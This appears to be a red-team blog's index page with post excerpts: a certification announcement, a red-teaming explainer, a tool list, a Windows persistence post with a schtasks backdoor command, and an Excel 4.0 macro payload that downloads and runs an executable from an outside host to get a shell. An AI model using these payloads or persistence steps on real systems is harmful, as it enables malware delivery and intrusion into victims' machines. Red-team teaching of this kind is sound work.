Posts

You may already know me, I am Jobyer Ahmed, live in Bangladesh. Another identity is the founder of RedNode (Previously Redtm). I proudly want to say recently I became OSCE3(OffSec Certified Expert) Certified, and perhaps, I am the only person holding this certificate in Bangladesh. I also have earned other certificates, such as OSCP, Pentest+, Security+, and some others. I wanted to share my journey in the hopes that it might inspire others who have similar aspirations....

It is Red Teaming. Huh? Wow, What is Red Teaming? It is about acting as real cyber threats to attack organizations from different angles to find weaknesses and report to the internal team. The Red team is highly skilled in taking advantage of Human, Technical, and physical weaknesses. So, what is usually involved with Red Teaming? Before having a quick look, be informed that It is crucial to bypass the defense and perform every step in stealth mode....

Here are some common methods for maintaining access. If you find any errors or need to update anything, please mail me! Schedule Task We can create schedule to execute our specified binary or command. For example if we want to execute UpdateMessenger.exe every two hour. We can use below methods. Native Windows Command Upload your backdoor and run following command: schtasks /create /sc hourly /mo 2 /tn "UpdateMessenger" /tr C:\Windows\Tasks\UpdateMessenger.exe /ru "SYSTEM" Using SharPersist ....

This is a collection of red teaming tools that will help in red team engagements. The list is not complete, so i will keep updating it! Reconnaissance These tools are used to gather information passively or actively. Tools Name Descriptions Nmap Port/Service/Vulnerability Scanner DnsRecon, Amass DNS Enumeration Tool Nikto Website Misconfiguration Finder Burp Suite Pro Web Analyzing Semi-auto Tool theHarvester Find sub-domain, email address and employee info Metgoofil Extract pdf,doc,xls, etc SpiderFoot Open-source Information Gathering framework Recon-ng Open-source Information Gathering framework Weaponization & Initial Foothold Cracking Password Password attacking tools for initial footholds...

Microsoft Excel Payload for initial foothold is old method but still widely used by APTs. Microsoft Excel 4.0 Macro Payload Right click on the workbook and click insert Select MS Excel 4.0 Macro paste following payload: =EXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.8.168:8000/20.exe -outfile c:\users\public\20.exe") =WAIT(NOW()+"00:00:10") =EXEC("powershell -ep Bypass -W Hidden c:\users\public\20.exe") =HALT() Now Select first cell and rename it to Auto_Open Save as Excel 97-2003 Workbook(XLS) When victim Enable Content We get shell...